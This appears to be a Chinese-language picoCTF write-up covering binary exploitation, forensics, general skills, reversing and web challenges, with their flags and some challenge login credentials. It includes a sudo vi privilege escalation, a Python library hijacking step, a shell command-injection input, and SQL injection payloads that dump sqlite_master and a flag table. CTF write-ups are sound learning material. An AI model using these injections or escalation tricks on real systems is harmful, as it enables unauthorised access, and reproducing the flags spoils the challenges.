Binary Exploitation
hijacking
AUTHOR: THEONESTE BYAGUTANGAZA
Description
Getting root access can allow you to read the flag. Luckily there is a
python file that you might like to play with.
Through Social engineering, we've got the credentials to use on the
server. SSH is running on the server.
隨便逛逛
發現/challenge資料夾很可疑,但是沒辦法cd進去
查看sudo 發現使用者可以用sudo權限使用vi
exploit
1 | sudo vi |
privilege escalation了,再來就直接A進去/challenge/把flag撈出來就好
picoCTF{pYth0nn_libraryH!j@CK!n9_5a7b5866}
原本解法
這題當初在解的時候是在.server.py裡面import 的base64裡面搞鬼
只是不知道為甚麼在寫writeup的時候沒辦法用root權限執行.server.py
先ls -al
發現有一個.server.py
cat .server.py
1 | import base64 |
vim .server.py
沒辦法動.server.py
,因為他是readonly,但是權限沒有設定到base64.py
在import file裡面加料vim /usr/lib/python3.8/base64.py
1 | import os |
get shell
1 | sudo python3 .server.py |
Forensics
hideme
AUTHOR: GEOFFREY NJOGU
Description
Every file gets a flag.
The SOC analyst saw one image been sent back and forth between two
people. They decided to investigate and found out that there was more
than what meets the eye here.
下載下來發現是一張圖片
看一看感覺很正常
用exiftool
看了一下沒有把flag藏在某個欄位裡
strings flag.png
看看
發現裡面有長得很像路徑的東東
直接把flag.png
當成zip解壓縮看看
1 | unzip flag.png |
得到半張flag
picoCTF{Hiddinng_An_imag3_within_@n_ima9e_92076717}
FindAndOpen
AUTHOR: MUBARAK MIKAIL
Description
Someone might have hidden the password in the trace file.
Find the key to unlock this file. This tracefile might be good to analyze.
這題給了兩個檔案,第一個是flag.zip
和dump.pcap
。
嘗試解壓縮flag.zip
,發現需要密碼
先從dump.pcap
下手看看
用wireshark打開dump.pcap
隨便看幾個封包後發現都有明文
找到一個超可疑的封包,=
結尾很可能是base64編碼的填充字元
decode後得到半截flag
This is the secret: picoCTF{R34DING_LOKd_
回到flag.zip
,直接通靈把第一段flag當密碼
picoCTF{R34DING_LOKd_fil56_succ3ss_5ed3a878}
??
General Skills
money-ware
AUTHOR: JUNI19
Description
Flag format: picoCTF{Malwarename}
The first letter of the malware name should be capitalized and the rest
lowercase.
Your friend just got hacked and has been asked to pay some bitcoins to
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is
going on and asks you for advice. Can you identify what malware he’s
being a victim of?
Google 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
找到CNBC的新聞
picoCTF{Petya}
水爛
repetitions
AUTHOR: THEONESTE BYAGUTANGAZA
Description
Can you make sense of this file?
Download the file here.
下載enc_flag
1 | VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh |
==經典base64
decode後
1 | VjFSQ2EyTXlSblJUV0dSVllrWmFWRmx0TlZOalJtUlhZVVU1YVZKVVZuaFdWekZoWVZkR2NrNVVX |
再decode
1 | V1RCa2MyRnRTWGRVYkZaVFltNVNjRmRXYUU5aVJUVnhWVzFhYVdGck5UWmFSVkpQWVRGbmVWVnVR |
de
1 | WTBkc2FtSXdUbFZTYm5ScFdWaE9iRTVxVW1aaWFrNTZaRVJPYTFneVVuQlpla0pyU1ZjME5GZ3lV |
deeee
1 | Y0dsamIwTlVSbnRpWVhObE5qUmZiak56ZEROa1gyUnBZekJrSVc0NFgyUXdkMjVzTURSa00yUmZN |
eeeeeeee
1 | cGljb0NURntiYXNlNjRfbjNzdDNkX2RpYzBkIW44X2Qwd25sMDRkM2RfMWUwMmEzMmZ9Cg== |
aaaaaaaaaa
1 | picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f} |
picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}
Permissions
AUTHOR: GEOFFREY NJOGU
Description
Can you read files in the root file?
The system admin has provisioned an account for you on the main server:
ssh -p 53849 [email protected]
Password: x+T6aPgE4-
Can you login and read the root file?
picoCTF{uS1ng_v1m_3dit0r_f6ad392b}
水爛
chrono
AUTHOR: MUBARAK MIKAIL
Description
How to automate tasks to run at intervals on linux servers?
Use ssh to connect to this server:
Server: saturn.picoctf.net
Port: 50602
Username: picoplayer
Password: tPmsUpiHeZ
picoCTF{Sch3DUL7NG_T45K3_L1NUX_0bb95b71}
?
useless
AUTHOR: LOIC SHEMA
Description
There's an interesting script in the user's home directory
Additional details will be available after launching your challenge instance.
picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_6173}
Special
AUTHOR: LT 'SYREAL' JONES
Description
Don't power users get tired of making spelling mistakes in the shell? Not
anymore! Enter Special, the Spell Checked Interface for Affecting Linux.
Now, every word is properly spelled and capitalized... automatically and
behind-the-scenes! Be the first to test Special in beta, and feel free to
tell us all about how Special streamlines every development process that
you face. When your co-workers see your amazing shell interface, just
tell them: That's Special (TM)
Start your instance to see connection details.
Additional details will be available after launching your challenge
instance.
這題會一直把輸入的指令變成很簡單的單字,然後把開頭用成大寫ls
會變Is
cat
會變Cat
,但如果不是第一個字母就不會變大寫,所以可以用cat指令
用;
搭配Regex Command Injection
1 | cat;cat * |
發現目錄下面有一個資料夾blargh
1 | cat;cat blargh/* |
picoCTF{5p311ch3ck_15_7h3_w0r57_f578af59}
Reverse Engineering
Reverse
AUTHOR: MUBARAK MIKAIL
Description
Try reversing this file? Can ya?
I forgot the password to this file. Please find it for me?
題目給了一個檔案ret
,執行後要輸密碼
丟GDB
1 | start |
在呼叫strcmp比對密碼時把rsi
dump出來,得到前半截flag
picoCTF{3lf_r3v3r5ing_succe55ful_9ae8528
重新執行ret
,輸入密碼
picoCTF{3lf_r3v3r5ing_succe55ful_9ae85289}
Web Exploitation
More SQLi
AUTHOR: MUBARAK MIKAIL
Description
Can you find the flag on this website.
Additional details will be available after launching your challenge instance.
Bypass login
進入網頁,經典登入介面
1 | username=admin& |
題目很貼心把query
都print出來給你
調整一下
1 | username=123& |
進入之後有一個搜尋頁面
測試有幾個欄位
1 | searchInput=' union select 1,2,3;-- |
dump Table
1 | searchInput=' or 'a'='a |
沒看到flag
,可能在別的table
1 | ' union select group_concat(sql),2,3 from sqlite_master WHERE type='table';-- |
現在知道flag
應該在more_table
的flag_TEXT
欄位
1 | ' union select flag,2,3 from more_table;-- |
picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_3b0fca37}
MatchTheRegex
AUTHOR: SUNDAY JACOB NWANYIM
Description
How about trying to match a regular expression
Additional details will be available after launching your challenge instance.
一開始沒看hint不知道到底要幹嘛
結果是要match^p.....F!?
picoCTF{succ3ssfully_matchtheregex_9080e406}
世紀水題
findme
AUTHOR: GEOFFREY NJOGU
Description
Help us test the form by submiting the username as test and password as test!
Additional details will be available after launching your challenge instance.
先用test
test!
登入
進去後他說I was redirected here by a friend of mine but i couldnt find anything. Help me search for flags :-)
用BurpSuite
查看被redirected的頁面
id看起來很像經典base64
picoCTF{proxies_all_the_way_be716d8e}